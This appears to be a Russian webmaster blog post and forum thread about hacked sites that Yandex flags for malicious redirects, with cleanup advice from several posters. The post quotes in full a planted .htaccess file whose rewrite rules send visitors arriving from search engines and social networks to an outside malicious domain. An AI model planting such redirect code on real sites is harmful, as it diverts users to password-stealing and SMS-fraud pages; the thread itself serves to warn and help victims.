Новый вирус – «Поведенческий анализ» определяется Яндексом

Технологии не стоят на месте. Появился новый вирус который открывает нужные сайты в зависимости от сайтов с которых вы заходите.

Определяется вирус в Яндексе как «Поведенческий анализ».

Вирус может направлять пользователей зашедших на ваш сайт на какие угодно сайты, на сайты с вирусами которые будут воровать ваши пароли или блокировать компьютер и вымогать послать СМС на их номер.

Эти вирусы могут использоваться для накручивания посетителей на сайтах. Также и для раскрутки сайтов поведенческим фактором.

Имея полный доступ к вашим сайтам, преступники могут менять адреса и направлять посетителей на новые и новые ресурсы.

Поисковые системы Яндекс и Google опережают на 1 шаг создателей вирусов и постепенно блокируют подобные зараженные сайты (примерно в течение недели), но если сайт популярный и был взломан то многие посетители за эту неделю могут пострадать.

Заражение происходит из-за кражи паролей от хостинга, либо от взлома хостинга. На хостинг размещается файл .htaccess (вредоносный код сдвинут пробелами, что бы вы его не сразу смогли найти) с таким содержанием:



ErrorDocument 400 secaviable.ru/about/index.php

ErrorDocument 401 secaviable.ru/about/index.php

ErrorDocument 403 secaviable.ru/about/index.php

ErrorDocument 404 secaviable.ru/about/index.php

ErrorDocument 500 secaviable.ru/about/index.php

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.* [OR]

RewriteCond %{HTTP_REFERER} .*ask.* [OR]

RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]

RewriteCond %{HTTP_REFERER} .*baidu.* [OR]

RewriteCond %{HTTP_REFERER} .*youtube.* [OR]

RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]

RewriteCond %{HTTP_REFERER} .*qq.* [OR]

RewriteCond %{HTTP_REFERER} .*excite.* [OR]

RewriteCond %{HTTP_REFERER} .*altavista.* [OR]

RewriteCond %{HTTP_REFERER} .*msn.* [OR]

RewriteCond %{HTTP_REFERER} .*netscape.* [OR]

RewriteCond %{HTTP_REFERER} .*aol.* [OR]

RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]

RewriteCond %{HTTP_REFERER} .*goto.* [OR]

RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]

RewriteCond %{HTTP_REFERER} .*mamma.* [OR]

RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]

RewriteCond %{HTTP_REFERER} .*lycos.* [OR]

RewriteCond %{HTTP_REFERER} .*search.* [OR]

RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]

RewriteCond %{HTTP_REFERER} .*bing.* [OR]

RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]

RewriteCond %{HTTP_REFERER} .*facebook.* [OR]

RewriteCond %{HTTP_REFERER} .*twitter.* [OR]

RewriteCond %{HTTP_REFERER} .*blog.* [OR]

RewriteCond %{HTTP_REFERER} .*live.* [OR]

RewriteCond %{HTTP_REFERER} .*myspace.* [OR]

RewriteCond %{HTTP_REFERER} .*mail.* [OR]

RewriteCond %{HTTP_REFERER} .*yandex.* [OR]

RewriteCond %{HTTP_REFERER} .*rambler.* [OR]

RewriteCond %{HTTP_REFERER} .*ya.* [OR]

RewriteCond %{HTTP_REFERER} .*aport.* [OR]

RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]

RewriteCond %{HTTP_REFERER} .*flickr.*

RewriteRule ^(.*)$ secaviable.ru/about/index.php [R=301,L]

</IfModule>


Проблема… Яндекс мой сайт запихнул как ( вредоносный сайт) выдал сылки с вредносным кодом Определяется вирус в Яндексе как «Поведенческий анализ».
Переправерил все файлы онлайн сервисами и другими заморочками… показывает что сайт чист только Яндекс гонит… то выдает на статью которую сам писал типо в нем код… то на фото… то на блог… удалил эти сатьи и фото также записи блога… отправил на переправерку… всё равно выдает что сайт атакует компы

Кто сталкивался с такой проблемой как решал????????

Сайтик дайте в личку, богатый опыт работы с сайтами клиентов, такого рода. Возможно найду причину. И яндекс сразу не снимает, как правило время надо.

Было такое, даже два раза.

Решение — пробежаться по файлам, проверить даты изменения. Потом позаходить на сайт с поисковиков — если переадресует, продолжить поиски.

После исправления в Яндекс.Вебмастер подать запрос на перепроверку — это может занимать до двух недель.

не в первой… все перечислиные действия делал

не знаю как раньше, но сейчас пока роботы не перепроверят в выдаче сайт будет помечен даже если удалите все файлы! так что если точно уверены что убрали все — скоро снимут пометку.

Потом позаходить на сайт с поисковиков — если переадресует, продолжить поиски.

сейчас снимается пометка после перепроверки! а до этого даже без вирусов пометка будет!

Кто сталкивался с такой проблемой как решал????????

У меня еще хитрее вирусологи оказались. Внедрили недавно в .htaccess — какой-то хитрый код. Главное с обычного компьютера или смартфона заходишь все нормально. А когда с обычного сотового — отправляет на какйо-то сайт с MiniOperа и предлагает ее скачать — за плату путем отправки СМС. Я даже не сразу его заметил — один пользователь пожаловался — что на сайт невозможно попасть с обчного телефона — я стал проверять точно. Сперва обратился к хостеру — они мне сразу проверяйте .htaccess — проверил точно — код внедрен. Ну просто удалил и поменял все пароли на Хостинге и FTP, и еще купил всетаки IP фиксированный домой, на работе был уже — и включил фильтрацию доступа как на хостинге, так и в админке Instant. В общем надеюсь больше никто в мою админку не залезет на хосте и вредоносный код не внедрит. Хотя наверное есть хакеры — которым и это не проблема.

IP фиксированный домой,

кто в курсе если поставить так же на хост и дома- панацея от взлома?

Мой сайт два раза взламывали и каждый раз все антивирусы (около 20 популярных, включая, который стоял на моем компе)- молчали. И Перепроверка всех файлов онлайн сервисами и другими заморочками… тоже результатов не давала. Только Касперский нашел, о чем сообщали пользователи, прикладывая скрины. Купила Каспера — прогнали через него файлы — нашел кучу измененных вредных файлов.

Решение — пробежаться по файлам, проверить даты изменения. Потом позаходить на сайт с поисковиков — если переадресует, продолжить поиски.

Скрипт поиска измененных файлов

нашел такой код

А когда с обычного сотового — отправляет на какйо-то сайт с MiniOperа и предлагает ее скачать — за плату путем отправки СМС.

Обычные смс партнерки. Ломают все сайты на ДЛе особенно часто. Обновление помогает.